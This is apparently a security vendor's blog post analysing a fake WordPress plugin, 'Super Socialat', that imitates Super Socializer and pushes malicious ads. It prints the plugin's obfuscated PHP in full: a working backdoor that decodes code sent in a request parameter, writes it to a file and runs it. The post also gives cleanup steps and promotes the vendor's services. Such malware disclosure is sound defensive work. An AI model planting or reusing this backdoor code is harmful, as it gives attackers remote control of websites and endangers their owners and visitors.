Astra security engineers often find fake plugins installed on hacked websites. One such recent malware cleanup uncovered a fake plugin of Super Socializer Plugin in WordPress. This fake plugin triggered fake & malicious ads on the website. The plugin goes by the name “Super Socialat“, which clearly is a play on the name Super Socializer.
We will discuss the details (location, codes, etc) of Super Socialat in a minute. First, let me give you a little background of the original plugin- Super Socializer. Super Socializer is a plugin that helps websites with easy social logins and social sharing. At the time of writing this, it has 60,000+ active installations.
Technical Details: Fake Super Socializer Plugin
Moving on to the details. The Super Socialat plugin deems as follows in your plugins list.
Our security researcher found that the fake plugin was skillfully hidden in the wp-content/plugins/super-socialat/super_socialat.php
On closer examination, they found the following malicious codes injected in the website:
<?php/*Plugin Name: Super SocialatPlugin URI: https://super-socializer-wordpress.heateor.comDescription: A complete 360 degree solution to provide all the social features like Social Login, Social Commenting, Social Sharing, Social Media follow and more.Version: 7.12.5Author: Team HeateorAuthor URI: https://www.heateor.comText Domain: super-socialatDomain Path: /languagesLicense: GPL2+*/$a = chr(95).chr(116).chr(101).chr(109).chr(112).chr(108).chr(111).chr(99).chr(97).chr(116).chr(105).chr(111).chr(110);$c = chr(102).chr(105).chr(108).chr(101).chr(95).chr(112).chr(117).chr(116).chr(95).chr(99).chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(115);$d = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);$f = chr(60).chr(63).chr(112).chr(104).chr(112).chr(32);$b = $f.$d($_REQUEST[chr(100).chr(49)]);@array_diff_ukey(@array((string)($a) => 1), @array((string)($b) => 2), $c);@include($a);@unlink($a);
What You Can Do?
If you have also seen fake ads/ico files on your site, this is what you can do.
Check Your Plugins List
Start with a manual check of your plugins. Make sure there are no plugins by the name “Super Socialat” installed on your website. If you do find the plugin, remove it instantly.
Check Fake User Accounts
We have also seen many fake accounts being created in these cases. Hackers usually devise a way to prolong their access to hacked sites. Creating fake user accounts is one of them.
To check the hack, review the user accounts on your website. Reviewing the wp_users table in your database can surely help in identifying fake accounts and remove them.
I want to specially mention here that just removing the fake plugin is not a solid solution. Understand that the hacker was able to insert this plugin due to some vulnerability. Hence, you need to do a proper malware cleanup of your WordPress.
You can also refer to the step-by-step WordPress malware removal guide.
Being Careful is the Key to Safety
All WordPress users are advised to double-check the plugins before installing. If your website has been behaving crazy as well, raise a malware cleanup request from here. Our security experts will clean the infection in just about 4-6 hours.
If you are not sure about the infection, check online for free.
If you are not hacked, do not risk an attack by being lousy in securing your website. The simplest way you can you do that is by installing a trusted plugin that does all that for you. The WP Hardening by Astra automates security audit and fixing for you. You can now secure more than 12 crucial aspects of your website with a click.
If you want your website to be hardened to these hacks and more, install WP Hardening from here for free.
Have any concerns about your website, comment below or contact us, we promise to reply 🙂